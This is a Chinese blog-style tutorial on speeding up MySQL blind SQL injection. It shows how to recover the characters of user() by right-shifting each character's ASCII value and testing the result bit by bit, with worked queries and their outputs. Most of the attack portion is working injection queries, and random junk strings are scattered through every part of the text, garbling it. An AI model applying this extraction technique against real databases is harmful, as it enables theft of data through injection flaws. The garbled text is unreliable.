关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


2 q' V7 K3 e/ t
下面将以查询mysql数据库当中user()的第一位为例:
8 x6 D9 m) l  K' P9 |" I" T* w
4 f7 H6 b8 c; Y, K

% M! G; U1 w$ y) Aps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)



6 Z8 e: N0 ^  u首先执行如下sql语句:
* U1 \2 |1 C9 f1 |4 E
7 O6 y6 R- R+ c4 I! @9 }

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;

7 [# A- E4 R+ Y, z7 @5 C$ y/ q2 U
% m9 x/ Y& V' v
- Q. ?  s2 x5 s& }我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

4 Q7 E/ F5 T6 V( o+ g& J: G0 f: l$ M  K

第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1

6 q- Y" R0 q( ~) `
* W' i. X8 O( r6 d: o1 ^% l
如果运算结果为1,说明第一位为0,不为1
; t$ \8 |- k, n1 m# o

- C! W& \7 N; A' m
; Q) ]3 `3 Q5 r, T& b. B2 i7 D3 b4 A* P+————————————–+
. M8 R1 r' p2 l$ r: R
| (ascii((substr(user(),1,1))) >> 7)=0 |
2 j, P- H7 w8 i+ G. p2 e; e
# r3 e. o5 x$ }+————————————–+
1 I' W5 e) x" T) X6 }: g
| 1 |
$ A7 V, s5 h; Z  V# P
+————————————–+

7 x$ N7 I) G- f+ `* @% ]* a1 row in set (0.00 sec)
$ I* M# S8 S' r8 v/ V& c( n
这样我们就确定这个8bit的ascii的第一位为0
9 q' ?$ Q: t5 x4 y

7 F2 N: c! w0 U' {; o* q! k
第二次我们来做6次右偏移来确定前两位



前两位可能是01或00,即依然可以与0做比较,

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

, A" v/ L' ~1 \& F! F& F" q+————————————–+
! [2 E$ N5 l! B' X4 x7 ~) b
8 a' l. E( G% G: f| (ascii((substr(user(),1,1))) >> 6)=0 |

+————————————–+

| 0 |

8 H$ H! Q. ?6 J$ J8 B, l+————————————–+

: @  G% T# D7 c  ~1 row in set (0.00 sec)

; u9 J; S8 M* f) ~. b- w- z2 t9 b

结果为0,即第二位为1
4 U1 M8 F' B: S5 c1 H" ^/ K3 @2 u

% |+ M4 v& V7 q4 Z1 m8 _4 |. q
开始猜测前三位为010或011
9 x( O' D! I- @- i3 a7 w: Z
3 d7 e& W7 V6 G4 |
. i3 w5 E0 M6 y. Q9 W# |% x& v; Z3 ~
让我们看看010和011的ascii码是多少
2 d& Z8 y) b! s" O


  W  Z; b7 T. Q# g& f7 L! a分别查询select b’011′ select b’010′


. z) ?3 ?. W2 y+ j6 M
获得结果 010 = 2 011 = 3



8 ?. z: E7 F7 G执行如下sql:
% C' Q1 `" r# U4 a. u

* Z; Y4 x2 k. \9 L6 y2 Q
1 @( N4 r+ E+ K' u( ^0 S9 b2 |mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
4 ~5 {4 Q* ]/ Z1 N( P( [
* G0 p+ C5 g, R# @0 f- x: k& d+————————————–+
; W) f; C6 s0 G/ X; F) e$ D0 w6 P
| (ascii((substr(user(),1,1))) >> 5)=2 |
  A& g/ ^- H/ s3 Q
+————————————–+
" I# y. L! ~( s
0 ~  X1 X- m' ^2 \| 0 |
5 u8 g/ {6 x% }  J" W& ]. n. V
( L  F5 B2 o' y. D) e  C) C- ~+————————————–+
! @2 e! m# |2 P2 [
5 B# ^% B7 Y) r1 u! L' r* b) U即前三位不为010,而是011
9 M/ [$ r% T* b+ u0 O


/ X! d' Z: f$ Y5 A/ ?直到获得最后一位
! [3 y" _2 I& [" |' u
" j; R! s& `$ k) L. d0 f

6 G+ Y0 f2 b' X! F/ D最终结果为:01110010
2 k8 O6 b6 ?# R5 E1 k


转换一下:
, U' L, E' H6 g% u( I+ k5 r) |( q/ \! X

9 ?6 }- V6 U' X3 X4 L
select b’01110010′
7 ?8 F& P  q  S- e

; k& {8 X/ U8 y. z. u$ A- k
3 U& N: M0 H- C3 [7 T- P查询结果
, Y, t- Z' R$ M, a8 k8 Z
" B4 Y% b  c% M+ N! E& L$ X' _6 X

+————-+
3 s3 B% A% w7 Z( Z" f* T
| b’01110010′ |

+————-+

| r |
5 ~2 E$ S0 p0 e( t! f+ ^
+————-+

1 row in set (0.00 sec)
5 a( E' _9 w3 s, }# y6 O' g$ i


2 `  r8 O; _5 G# b* B这样我们就获得了user()的第一位.其它位依此类推